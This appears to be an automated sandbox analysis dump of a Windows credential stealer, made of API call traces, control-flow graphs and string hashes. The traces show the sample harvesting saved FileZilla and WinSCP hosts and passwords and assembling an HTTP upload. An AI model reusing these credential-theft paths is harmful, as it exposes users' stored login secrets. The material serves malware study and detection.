                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0008E77E
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,000B6912,000B690F,000B690E,000B690D), ref: 0008E7C4
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008E7CB
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0008E7DF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008E7EA
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0008E81E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008E829
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0008E857
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008E862
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0008E890
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008E89B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008E901
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008E915
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(0008ECBC), ref: 0008EA3D
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 4146028692-935134978
                                                                                                                                                                                                                                                    • Opcode ID: 6d166061ab1d0c3e93675479fd79a86d2e7d642175e22fd12744545d4a48a133
                                                                                                                                                                                                                                                    • Instruction ID: 5545d4249a5095827ffe3e330397b86294ef89c570b24a9fcec71eea36d8a5fa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d166061ab1d0c3e93675479fd79a86d2e7d642175e22fd12744545d4a48a133
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9A14E32D41219AFCF01BBA0EC4A9DE7BB8FF14700F514461F655BB062DB74AE069B91

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008E1B7
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008E1D7
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008E1E8
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008E1F9
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E22D
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0008E25E
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E276
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E29D
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E2BD
                                                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0008E2E0
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,000B68E7), ref: 0008E379
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0008E3D9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 463713726-2798830873
                                                                                                                                                                                                                                                    • Opcode ID: f63930bed6a086b786caccea364bb3087ec4628c51e418244d5258b2489f800e
                                                                                                                                                                                                                                                    • Instruction ID: dbe8cc4dd737bbac32faa4cc1b26ad1f5931c149197dee9eb5bb57d8eb26f3e6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f63930bed6a086b786caccea364bb3087ec4628c51e418244d5258b2489f800e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92D1B47191012DAEDF21EB90DC41ADAB7B8BF44304F4144E7AA48B6052EB707F89DFA1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 568 85f39-85ffe call 90519 call 84ab6 call 904e7 * 5 InternetOpenA StrCmpCA 583 86000 568->583 584 86006-8600c 568->584 583->584 585 866ff-86727 InternetCloseHandle call 88048 584->585 586 86012-8619c call 91c4a call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 905c7 call 9058d call 82920 * 2 InternetConnectA 584->586 591 86729-86761 call 90549 call 90609 call 9058d call 82920 585->591 592 86766-867ec call 82920 * 4 call 81cde call 82920 call 9d016 585->592 586->585 662 861a2-861dc HttpOpenRequestA 586->662 591->592 663 861e2-861e8 662->663 664 866f3-866f9 InternetCloseHandle 662->664 665 861ea-86200 InternetSetOptionA 663->665 666 86206-86690 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 905c7 call 9058d call 82920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call a7050 lstrlenA * 2 call a7050 lstrlenA HttpSendRequestA 663->666 664->585 665->666 809 866d2-866ea InternetReadFile 666->809 810 866ec-866ed InternetCloseHandle 809->810 811 86692-8669a 809->811 810->664 811->810 812 8669c-866cd call 90609 call 9058d call 82920 811->812 812->809
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00085FD8
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00085FF6
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0008618E
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000861D2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,",mode,000B78D8,------,000B78CC,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,000B78B4,------,000B78A8,",000B789C,------), ref: 000865FD
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008660C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00086617
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008661E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008662B
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 00086639
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00086647
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00086655
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 00086662
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00086677
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00086685
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000866E2
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 000866ED
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 000866F9
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00086705
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086200
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                    • String ID: "$"$"$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode
                                                                                                                                                                                                                                                    • API String ID: 3702379033-116134722
                                                                                                                                                                                                                                                    • Opcode ID: daccd31ddbed9649829dd4deb91447a79e24223a5d8ed95554f7626ce5d639ed
                                                                                                                                                                                                                                                    • Instruction ID: 48397c864b8a7bd4293d65f051b0b8ab7bd622c1754c77a08bb4a30e47e6eceb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daccd31ddbed9649829dd4deb91447a79e24223a5d8ed95554f7626ce5d639ed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD2281319401699FDF61EB60DC46BCDB7B4BF04300F4184E2AA5DB7162DB706E9A9FA0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 818 98643-98653 call 9859a 821 98659-9883f call 87d47 GetProcAddress * 20 818->821 822 98844-988a1 LoadLibraryA * 5 818->822 821->822 824 988a3-988b0 GetProcAddress 822->824 825 988b5-988bc 822->825 824->825 827 988be-988e2 GetProcAddress * 2 825->827 828 988e7-988ee 825->828 827->828 829 988f0-988fd GetProcAddress 828->829 830 98902-98909 828->830 829->830 832 9890b-98918 GetProcAddress 830->832 833 9891d-98924 830->833 832->833 834 9894f 833->834 835 98926-9894a GetProcAddress * 2 833->835 835->834
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098684
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0009869B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000986B2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000986C9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000986E0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000986F7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0009870E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098725
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0009873C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098753
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0009876A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098781
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098798
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000987AF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000987C6
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000987DD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000987F4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0009880B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098822
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098839
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,000984C2), ref: 0009884A
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,000984C2), ref: 0009885B
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,000984C2), ref: 0009886C
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,000984C2), ref: 0009887D
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,000984C2), ref: 0009888E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75070000,000984C2), ref: 000988AA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75FD0000,000984C2), ref: 000988C5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 000988DC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A50000,000984C2), ref: 000988F7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74E50000,000984C2), ref: 00098912
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76E80000,000984C2), ref: 0009892D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00098944
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2238633743-0
                                                                                                                                                                                                                                                    • Opcode ID: 89acabbd3b3bcb9142fb71c04d250c140a1b1952869b262fdfeb15452caf4f24
                                                                                                                                                                                                                                                    • Instruction ID: 7fc9444e3e39070cd6b613c3842017aa43c6e4b26b5726e7b612fb1178cb9d58
